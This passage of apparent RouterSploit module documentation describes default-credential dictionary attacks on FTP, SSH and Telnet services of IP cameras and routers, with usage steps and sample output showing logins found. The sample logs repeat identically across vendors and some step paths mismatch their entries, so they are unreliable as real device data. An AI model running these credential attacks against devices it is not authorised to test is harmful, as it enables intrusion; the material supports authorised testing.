2. Do: `use creds/cameras/samsung/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/ftp_default_creds
rsf (Samsung Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Samsung Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/samsung/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/ssh_default_creds
rsf (Samsung Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Samsung Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/samsung/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/telnet_default_creds
rsf (Samsung Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/ftp_default_creds
rsf (Sentry360 Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/ssh_default_creds
rsf (Sentry360 Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/telnet_default_creds
rsf (Sentry360 Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Siemens Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/ftp_default_creds
rsf (Siemens Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Siemens Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/ssh_default_creds
rsf (Siemens Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Siemens Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/telnet_default_creds
rsf (Siemens Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Speco Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/ftp_default_creds
rsf (Speco Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Speco Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/ssh_default_creds
rsf (Speco Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Speco Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/telnet_default_creds
rsf (Speco Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Stardot Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/ftp_default_creds
rsf (Stardot Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Stardot Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/ssh_default_creds
rsf (Stardot Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Stardot Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/telnet_default_creds
rsf (Stardot Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Vacron Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/ftp_default_creds
rsf (Vacron Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Vacron Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/ssh_default_creds
rsf (Vacron Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Vacron Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/telnet_default_creds
rsf (Vacron Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/ftp_default_creds
rsf (VideoIQ Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/ssh_default_creds
rsf (VideoIQ Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/telnet_default_creds
rsf (VideoIQ Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Asmax Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/ftp_default_creds
rsf (Asmax Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Asmax Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/ssh_default_creds
rsf (Asmax Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Asmax Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/telnet_default_creds
rsf (Asmax Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Asus Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/ftp_default_creds
rsf (Asus Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Asus Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/ssh_default_creds
rsf (Asus Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Asus Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/telnet_default_creds
rsf (Asus Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Belkin Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/belkin/ftp_default_creds
rsf (Belkin Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
